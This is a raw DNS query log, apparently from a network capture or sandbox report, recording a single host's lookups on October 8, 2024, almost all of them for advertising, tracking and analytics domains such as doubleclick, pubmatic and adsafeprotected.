                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.968010902 CEST192.168.2.41.1.1.10x2103Standard query (0)um.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.968146086 CEST192.168.2.41.1.1.10x744cStandard query (0)um.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.973822117 CEST192.168.2.41.1.1.10x301dStandard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.973970890 CEST192.168.2.41.1.1.10x5866Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.976790905 CEST192.168.2.41.1.1.10x8de2Standard query (0)rtb0.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.976924896 CEST192.168.2.41.1.1.10x43aStandard query (0)rtb0.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.977247000 CEST192.168.2.41.1.1.10xef40Standard query (0)c.betrad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.977408886 CEST192.168.2.41.1.1.10x1b58Standard query (0)c.betrad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980448008 CEST192.168.2.41.1.1.10x327dStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980616093 CEST192.168.2.41.1.1.10x640Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.011189938 CEST192.168.2.41.1.1.10x430dStandard query (0)mwzeom.zeotap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.011378050 CEST192.168.2.41.1.1.10x6a11Standard query (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.012975931 CEST192.168.2.41.1.1.10x4789Standard query (0)d.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.013262987 CEST192.168.2.41.1.1.10x523eStandard query (0)d.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.212091923 CEST192.168.2.41.1.1.10x2f09Standard query (0)cs.yellowblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.212301016 CEST192.168.2.41.1.1.10x1b83Standard query (0)cs.yellowblue.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.263529062 CEST192.168.2.41.1.1.10x8646Standard query (0)rtbc-ew1.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.263650894 CEST192.168.2.41.1.1.10xbc9eStandard query (0)rtbc-ew1.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.420881987 CEST192.168.2.41.1.1.10xdbd6Standard query (0)tpsc-ew1.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.421381950 CEST192.168.2.41.1.1.10x6720Standard query (0)tpsc-ew1.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.545442104 CEST192.168.2.41.1.1.10xd2edStandard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.545733929 CEST192.168.2.41.1.1.10x5c3dStandard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.574234962 CEST192.168.2.41.1.1.10x71f1Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.574551105 CEST192.168.2.41.1.1.10x7f22Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.613835096 CEST192.168.2.41.1.1.10x85a2Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.614049911 CEST192.168.2.41.1.1.10x22bfStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.617357969 CEST192.168.2.41.1.1.10xbfb8Standard query (0)tps.doubleverify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.617609978 CEST192.168.2.41.1.1.10x8c52Standard query (0)tps.doubleverify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.644268990 CEST192.168.2.41.1.1.10xcaa7Standard query (0)simage2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.644731045 CEST192.168.2.41.1.1.10xeef8Standard query (0)simage2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.648562908 CEST192.168.2.41.1.1.10xae70Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.648793936 CEST192.168.2.41.1.1.10x7ccaStandard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.660692930 CEST192.168.2.41.1.1.10x376bStandard query (0)c.evidon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.661010981 CEST192.168.2.41.1.1.10xcf10Standard query (0)c.evidon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.186799049 CEST192.168.2.41.1.1.10x2bffStandard query (0)simage4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.186933041 CEST192.168.2.41.1.1.10x3553Standard query (0)simage4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.217212915 CEST192.168.2.41.1.1.10xe81aStandard query (0)s2s.t13.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.217335939 CEST192.168.2.41.1.1.10x3e3Standard query (0)s2s.t13.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.483339071 CEST192.168.2.41.1.1.10xc06fStandard query (0)exchange.mediavine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.483496904 CEST192.168.2.41.1.1.10xcb28Standard query (0)exchange.mediavine.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.660727024 CEST192.168.2.41.1.1.10xc81aStandard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.660942078 CEST192.168.2.41.1.1.10x9611Standard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.769011974 CEST192.168.2.41.1.1.10x4fb6Standard query (0)cs.yellowblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.769201994 CEST192.168.2.41.1.1.10xf7d7Standard query (0)cs.yellowblue.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.112550974 CEST192.168.2.41.1.1.10x1340Standard query (0)image4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.112675905 CEST192.168.2.41.1.1.10xa821Standard query (0)image4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.254127026 CEST192.168.2.41.1.1.10x4047Standard query (0)vidanalytics.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.254626989 CEST192.168.2.41.1.1.10x3674Standard query (0)vidanalytics.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:58.327508926 CEST192.168.2.41.1.1.10x89acStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:58.327934027 CEST192.168.2.41.1.1.10x31b7Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:02.203418016 CEST192.168.2.41.1.1.10x6169Standard query (0)csm.nl3.eu.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:02.203643084 CEST192.168.2.41.1.1.10x64eStandard query (0)csm.nl3.eu.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:04.239198923 CEST192.168.2.41.1.1.10xdedaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:04.244791031 CEST192.168.2.41.1.1.10x2c9fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:08.991208076 CEST192.168.2.41.1.1.10xbb14Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:08.997453928 CEST192.168.2.41.1.1.10x3b49Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.681498051 CEST192.168.2.41.1.1.10xb365Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.681890965 CEST192.168.2.41.1.1.10x95d0Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.019227982 CEST192.168.2.41.1.1.10x5d0aStandard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.019371033 CEST192.168.2.41.1.1.10x31e5Standard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.024208069 CEST192.168.2.41.1.1.10x1eb9Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.024372101 CEST192.168.2.41.1.1.10xa954Standard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.026227951 CEST192.168.2.41.1.1.10xaca2Standard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.026421070 CEST192.168.2.41.1.1.10xdc96Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.031507969 CEST192.168.2.41.1.1.10x6406Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.031697035 CEST192.168.2.41.1.1.10xf188Standard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.037409067 CEST192.168.2.41.1.1.10xf617Standard query (0)hbopenbid.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.037573099 CEST192.168.2.41.1.1.10x79feStandard query (0)hbopenbid.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.047738075 CEST192.168.2.41.1.1.10x5410Standard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.047950029 CEST192.168.2.41.1.1.10xd53fStandard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.845889091 CEST192.168.2.41.1.1.10xd403Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.846071005 CEST192.168.2.41.1.1.10x75b0Standard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.961761951 CEST192.168.2.41.1.1.10xb96eStandard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.962024927 CEST192.168.2.41.1.1.10xd7c1Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.965764046 CEST192.168.2.41.1.1.10x9aafStandard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.965934992 CEST192.168.2.41.1.1.10x199eStandard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.085994005 CEST192.168.2.41.1.1.10xd6c0Standard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.086251020 CEST192.168.2.41.1.1.10xb9bdStandard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.354671001 CEST192.168.2.41.1.1.10x5809Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.355175972 CEST192.168.2.41.1.1.10xbbedStandard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.412203074 CEST192.168.2.41.1.1.10x4ba1Standard query (0)ssc-cms.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.412355900 CEST192.168.2.41.1.1.10x5ffcStandard query (0)ssc-cms.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.067102909 CEST192.168.2.41.1.1.10x25dcStandard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.067251921 CEST192.168.2.41.1.1.10x531fStandard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.092541933 CEST192.168.2.41.1.1.10x12d6Standard query (0)de.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.092767954 CEST192.168.2.41.1.1.10x46abStandard query (0)de.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.739801884 CEST192.168.2.41.1.1.10xcbfcStandard query (0)hde.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.739994049 CEST192.168.2.41.1.1.10x3728Standard query (0)hde.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.091784000 CEST192.168.2.41.1.1.10x282dStandard query (0)fw.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.091923952 CEST192.168.2.41.1.1.10xf2deStandard query (0)fw.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.693085909 CEST192.168.2.41.1.1.10xfd24Standard query (0)secure-assets.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.693587065 CEST192.168.2.41.1.1.10xc5dcStandard query (0)secure-assets.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.697788954 CEST192.168.2.41.1.1.10xb6ebStandard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.698504925 CEST192.168.2.41.1.1.10xd56eStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.702239037 CEST192.168.2.41.1.1.10xb1c6Standard query (0)sync.teads.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.702855110 CEST192.168.2.41.1.1.10x94fcStandard query (0)sync.teads.tv65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.526227951 CEST192.168.2.41.1.1.10xab69Standard query (0)dt.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.526798010 CEST192.168.2.41.1.1.10xd387Standard query (0)dt.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.529692888 CEST192.168.2.41.1.1.10x6a63Standard query (0)static.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.530251980 CEST192.168.2.41.1.1.10x7c6bStandard query (0)static.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.531930923 CEST192.168.2.41.1.1.10x226fStandard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:33.532246113 CEST192.168.2.41.1.1.10xbffbStandard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.485388041 CEST192.168.2.41.1.1.10x2bcbStandard query (0)dt.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.485774040 CEST192.168.2.41.1.1.10x2057Standard query (0)dt.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.486008883 CEST192.168.2.41.1.1.10x3055Standard query (0)static.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.486394882 CEST192.168.2.41.1.1.10x35e9Standard query (0)static.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.486520052 CEST192.168.2.41.1.1.10xe862Standard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.486638069 CEST192.168.2.41.1.1.10x3423Standard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.980173111 CEST192.168.2.41.1.1.10x2f6eStandard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.980612993 CEST192.168.2.41.1.1.10x141cStandard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.004875898 CEST192.168.2.41.1.1.10x2bd7Standard query (0)fw.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.005230904 CEST192.168.2.41.1.1.10x2386Standard query (0)fw.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.091155052 CEST192.168.2.41.1.1.10xd815Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.091600895 CEST192.168.2.41.1.1.10xde3Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.546417952 CEST192.168.2.41.1.1.10x4af7Standard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.546760082 CEST192.168.2.41.1.1.10x3570Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.589608908 CEST192.168.2.41.1.1.10x6bdeStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.590152979 CEST192.168.2.41.1.1.10xdea9Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.611026049 CEST192.168.2.41.1.1.10x5629Standard query (0)as.jivox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.611455917 CEST192.168.2.41.1.1.10xe25bStandard query (0)as.jivox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.293350935 CEST192.168.2.41.1.1.10x3abdStandard query (0)pm.w55c.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.293544054 CEST192.168.2.41.1.1.10x5b5cStandard query (0)pm.w55c.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.294045925 CEST192.168.2.41.1.1.10xeff8Standard query (0)a.tribalfusion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.294188976 CEST192.168.2.41.1.1.10x86aaStandard query (0)a.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.295927048 CEST192.168.2.41.1.1.10x8d0fStandard query (0)www.temu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.296138048 CEST192.168.2.41.1.1.10xdb14Standard query (0)www.temu.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.320704937 CEST192.168.2.41.1.1.10xeb00Standard query (0)dt.adsafeprotected.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.321067095 CEST192.168.2.41.1.1.10xe8adStandard query (0)dt.adsafeprotected.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.325233936 CEST192.168.2.41.1.1.10xe5c5Standard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.325416088 CEST192.168.2.41.1.1.10xb808Standard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.326705933 CEST192.168.2.41.1.1.10x863bStandard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.326913118 CEST192.168.2.41.1.1.10x5e23Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329643011 CEST192.168.2.41.1.1.10x9367Standard query (0)sync.teads.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.329813004 CEST192.168.2.41.1.1.10x32c3Standard query (0)sync.teads.tv65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.372014999 CEST192.168.2.41.1.1.10xf623Standard query (0)as.jivox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.372324944 CEST192.168.2.41.1.1.10x1713Standard query (0)as.jivox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.936342955 CEST192.168.2.41.1.1.10xc920Standard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:37.937091112 CEST192.168.2.41.1.1.10x55ebStandard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:38.962594032 CEST192.168.2.41.1.1.10x85fdStandard query (0)playercdn.jivox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:38.962809086 CEST192.168.2.41.1.1.10xc598Standard query (0)playercdn.jivox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:38.963331938 CEST192.168.2.41.1.1.10xa76Standard query (0)s.tribalfusion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:38.963606119 CEST192.168.2.41.1.1.10xf7e0Standard query (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.342802048 CEST192.168.2.41.1.1.10x704fStandard query (0)events-ssc.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.342941046 CEST192.168.2.41.1.1.10x1a0eStandard query (0)events-ssc.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.883081913 CEST192.168.2.41.1.1.10x305cStandard query (0)s.tribalfusion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.883081913 CEST192.168.2.41.1.1.10x9e00Standard query (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.937227964 CEST192.168.2.41.1.1.10xa794Standard query (0)playercdn.jivox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.937227964 CEST192.168.2.41.1.1.10x6ba4Standard query (0)playercdn.jivox.com65IN (0x0001)false
